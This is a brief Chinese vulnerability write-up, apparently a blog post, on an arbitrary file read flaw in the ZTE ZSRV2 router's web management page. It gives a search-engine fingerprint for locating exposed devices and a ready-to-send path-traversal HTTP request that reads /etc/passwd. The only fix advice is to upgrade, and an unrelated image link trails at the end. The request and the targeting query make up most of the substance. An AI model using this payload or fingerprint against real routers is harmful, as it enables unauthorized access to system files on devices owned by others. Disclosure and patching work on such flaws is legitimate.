中兴-ZSRV2路由器-任意文件读取
文章目录
- 中兴-ZSRV2路由器-任意文件读取
- 免责声明
- 漏洞描述
- 搜索语法
- 漏洞复现
- 修复建议
免责声明
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任
漏洞描述
该路由器管理页面的存在任意文件读取漏洞
搜索语法
title=“ZSRV2路由器Web管理系统”
漏洞复现
GET /../../../../../../../../etc/passwd HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
修复建议
升级到最新版本
![[米联客-XILINX-H3_CZ08_7100] FPGA程序设计基础实验连载-23 VTC视频时序控制器设计](https://i-blog.csdnimg.cn/direct/804497a32b41462f82ea82c7cbddade5.png)
